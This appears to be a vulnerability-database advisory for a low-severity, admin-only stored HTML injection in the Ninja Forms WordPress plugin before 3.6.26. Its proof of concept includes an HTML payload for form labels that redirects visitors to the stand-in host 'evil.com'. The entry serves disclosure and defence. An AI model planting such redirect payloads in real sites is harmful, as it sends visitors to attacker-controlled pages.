Lucene search
Sayandeep DuttaWPEX-ID:558E06AB-704B-4BB1-BA7F-B5F6BBBD68D9HistoryAug 07, 2023 - 12:00 a.m.
Ninja Forms < 3.6.26 - Admin+ Stored HTML Injection
2023-08-0700:00:00
Sayandeep Dutta
53
ninja forms
admin+
stored html
injection
security vulnerability
EPSS
0.001
Percentile
23.9%
Description The plugin does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored HTML injection. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts/comments etc however the vendor acknowledged and fixed the issue
Put the following code in any form field (for example name, email, message etc) labels:
<!DOCTYPE html> <html> <head> <style> @keyframes moving { 0% { transform: translateX(0); } 50% { transform: translateX(100px); } 100% { transform: translateX(0); } } .horizontal-text { display: inline-block; animation: moving 2s infinite linear; } </style> </head> <body> <div class="horizontal-text">Sam</div> </body> </html>
or
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0; URL=https://evil.com">
</head>
<body>
<script>
window.location.href = "https://evil.com";
</script>
</body>
</html>Related
wpvulndb
wpvulndb
Ninja Forms < 3.6.26 - Admin+ Stored HTML Injection
2023-08-07 00:00:00
cve
cve
CVE-2023-4109
2023-08-30 15:15:09
cvelist
cvelist
CVE-2023-4109 Ninja Forms < 3.6.26 - Admin+ Stored HTML Injection
2023-08-30 14:22:02
prion
prion
Design/Logic Flaw
2023-08-30 15:15:00
nvd
nvd
CVE-2023-4109
2023-08-30 15:15:09
openvas
openvas
WordPress Ninja Forms Contact Form Plugin < 3.6.26 Multiple Vulnerabilities
2023-08-31 00:00:00
wordfence
wordfence